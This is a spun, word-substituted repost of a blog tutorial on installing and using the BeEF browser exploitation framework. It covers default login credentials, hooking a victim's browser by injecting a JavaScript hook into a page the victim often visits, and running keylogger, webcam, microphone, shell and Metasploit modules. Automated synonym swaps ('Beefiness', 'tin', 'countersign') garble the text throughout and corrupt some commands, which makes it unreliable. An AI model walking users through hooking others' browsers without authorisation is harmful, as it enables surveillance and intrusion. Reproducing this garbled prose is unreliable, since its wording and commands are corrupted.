Username and Password for Beef Xss

Browser Exploitation Framework (BeEF) is a penetration testing, or pen-testing, tool designed to provide effective client-side set on vectors and to exploit any potential vulnerabilities in the web browser. Beef is unique among pen-testing frameworks because it does not try to tackle the more secure network interface aspects of a system. Instead, Beefiness clings on to one or more web browsers to use as a Pavillion for injecting payloads, executing exploit modules, and testing a organisation for vulnerabilities by sticking to browser influenced utilities.

BeEF has a very capable, nonetheless straightforward, API that serves as the pin upon which its efficiency stands and grows out into an false of a full-fledged cyber attack.

This short tutorial volition have a look at several means that this flexible and versatile tool tin be of use in pen-testing.

Installing the Beefiness Framework

A Linux Bone such equally Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg Os is required to install BeEF on your local machine.

Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that information technology is not installed in your instance. To cheque if whether BeEF is installed, wait for BeEF in your Kali Linux directory. To do and so, go to applications>Kali Linux>Organisation Services>beefiness beginning.

Alternatively, yous tin burn up BeEF from a new last emulator by entering the following code:

$ cd /usr/share/beef-xss
$ cd ./beefiness

To install BeEF on your Kali Linux auto, open the command interface and type in the post-obit command:

$ sudo apt-get update
$ sudo apt-get install beef-xss

Beef should now be installed under /usr/share/beef-xss.

You can start using BeEF using the address described previously in this section.

Welcome to BeEF

Now, yous can come across the BeEF GUI in its full glory. Access the Beefiness server by launching your web browser and looking up the localhost (127.0.0.1).

Y'all can access the BeEF web GUI by typing the following URL in your web browser:

http://localhost:3000/ui/authentication

The default user credentials, both the username and countersign, are "beef:"

$ beef-xss-ane
$ BeEF Login Web GUI

At present that y'all have logged into the Beefiness web GUI, go on to the "Hooked Browsers" section. Online Browsers and Offline Browsers. This section shows the victim'south hooked condition.

Using Beef

This walkthrough volition demonstrate how to use Beef in your local network using the localhost.

For the connections to exist made outside the network, we will need to open ports and forrard them to the users waiting to connect. In this commodity, nosotros volition stick to our home network. Nosotros will hash out port forwarding in time to come articles.

Hooking a Browser

To get to the core of what Beefiness is about, outset, you lot volition need to understand what a Beef hook is. Information technology is a JavaScript file, used to latch on to a target's browser to exploit it while acting equally a C&C betwixt it and the attacker. This is what is meant by a "hook" in the context of using Beefiness. Once a web browser is hooked past Beefiness, you lot can go on to inject further payloads and begin with post-exploitation.

To observe your local IP address, you open a new terminal and enter the following:

Follow the steps below to perform the attack:

1. To target a web browser, you lot volition first need to identify a webpage that the victim to-be likes to visit frequently, and so attach a BeEF hook to information technology.
2. Deliver a javascript payload, preferably by including the javascript hook into the web page'southward header. The target browser will become hooked once they visit this site.

If y'all have been able to follow these steps without whatsoever problems, you lot should be able to see the hooked IP address and OS platform in the Beefiness GUI. Y'all can find out more virtually the compromised organisation by clicking on the hooked browser listed in the window.

Also, there are several generic webpage templates they accept made available for your use.

http://localhost:3000/demos/butcher/index.html

You can glean all sorts of information from hither, such equally the plugins and extensions that the browser is using, and various information about the hardware and software specs of the target.

The BeEF framework goes then far as to create complete logs of mouse movements, double-clicks, and other deportment performed past the victim.

Here is a listing of available modules that can be used to breach a designated arrangement. These modules include keyloggers and spyware, including the ones that use the webcams and microphones of the target browser.

Note that certain commands have a colored icon. These icons all have unlike connotations that you tin find out past taking the 'getting started' introductory tour, which introduces various aspects of the BeEF interface. Besides, notice how each module has a traffic low-cal icon associated with it. These traffic symbols are used to point any of the following:

• The control module works against the target and should be invisible to the user
• The command module works against the target but may be visible to the user
• The control module has yet to exist verified against this target
• The command module does not work against this target

You can also send trounce commands to the target system, as shown below:

Coupled with Metasploit, Beefiness tin can exist used to perform quite varied and intricate system exploitation using modules, such equally browser_auto_pwn.

Determination

BeEF is an incredibly powerful tool that you can use to fortify systems against cyberattacks. From providing spyware modules to tracking mouse motion on the targeted system, BeEF tin do information technology all. Information technology is a good thought, therefore, to test your organisation using this security forensics tool.

Hopefully, y'all found this tutorial useful to become you started with this tool with such diverse, useful functionality.

Nigh the writer

I am a freelancing software project developer, a software applied science graduate and a content writer. I love working with Linux and open-source software.

kimwainvis.blogspot.com

Source: https://linuxhint.com/hacking_beef/

Share this post